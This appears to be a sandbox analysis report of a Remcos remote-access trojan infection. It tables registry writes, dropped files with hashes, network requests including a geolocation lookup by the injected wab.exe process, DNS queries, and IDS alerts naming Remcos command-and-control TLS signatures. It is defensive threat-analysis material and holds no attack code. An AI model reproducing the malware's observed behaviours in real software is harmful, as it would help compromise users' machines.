| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (4280) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (4280) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (4280) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5244 | wab.exe | C:\Users\admin\AppData\Local\Temp\bhv20CE.tmp | — | |
MD5:— | SHA256:— | |||
| 4280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hfyo4ne2.f1w.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bd2dbazt.awa.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2764 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 4280 | powershell.exe | C:\Users\admin\AppData\Roaming\Attacheship.But | text | |
MD5:E05578CF382D5E05695CDEF80D283B32 | SHA256:D4FE14C1AAE5B7CA093B5796CF71F4A6BE6A7613721E97F0CF9D3F194B243D14 | |||
| 5396 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | der | |
MD5:8D1040B12A663CA4EC7277CFC1CE44F0 | SHA256:3086094D4198A5BBD12938B0D2D5F696C4DFC77E1EAE820ADDED346A59AA8727 | |||
| 5396 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | binary | |
MD5:1D293D83F6BA5B3F79E39A27DF1D1E69 | SHA256:23420442D3C6FE8C3510B50094847D990B354005ED286490EFA5103EACF4A787 | |||
| 2764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2octwusz.syl.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5396 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | binary | |
MD5:8BEE5C500E332E5B66BBDF19231431F7 | SHA256:737E8A636DF553FDCFBD72C3B2106EE19CB1774939BBC0BE080E658A9460417C | |||
| 2764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kydvdans.que.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4080 | svchost.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
5396 | wab.exe | GET | 200 | 142.250.186.99:80 | http://c.pki.goog/r/r1.crl | unknown | — | — | unknown |
4080 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
920 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/canonical.html | unknown | — | — | unknown |
920 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/success.txt?ipv4 | unknown | — | — | unknown |
5396 | wab.exe | GET | 200 | 142.250.186.99:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDi7RJljCZ1LRIpG0W1dbT6 | unknown | — | — | unknown |
5396 | wab.exe | GET | 200 | 142.250.186.99:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD6WcGXKc43vxAH0QR68fc3 | unknown | — | — | unknown |
5396 | wab.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | — | — | unknown |
5396 | wab.exe | GET | 200 | 142.250.186.99:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | unknown | — | — | unknown |
5828 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | unknown |
4080 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4428 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5140 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4364 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4080 | svchost.exe | 2.16.241.19:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
4080 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown |
920 | firefox.exe | 34.107.221.82:80 | detectportal.firefox.com | GOOGLE | US | whitelisted |
4680 | SearchApp.exe | 2.19.120.21:443 | r.bing.com | Akamai International B.V. | DE | unknown |
Domain | IP | Reputation |
|---|---|---|
6777.6777.6777.677e |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
detectportal.firefox.com |
| whitelisted |
prod.detectportal.prod.cloudops.mozgcp.net |
| whitelisted |
example.org |
| whitelisted |
ipv4only.arpa |
| whitelisted |
r.bing.com |
| whitelisted |
login.live.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2184 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net |
5396 | wab.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
5396 | wab.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
5396 | wab.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
5396 | wab.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
5396 | wab.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
5396 | wab.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
5396 | wab.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
5396 | wab.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |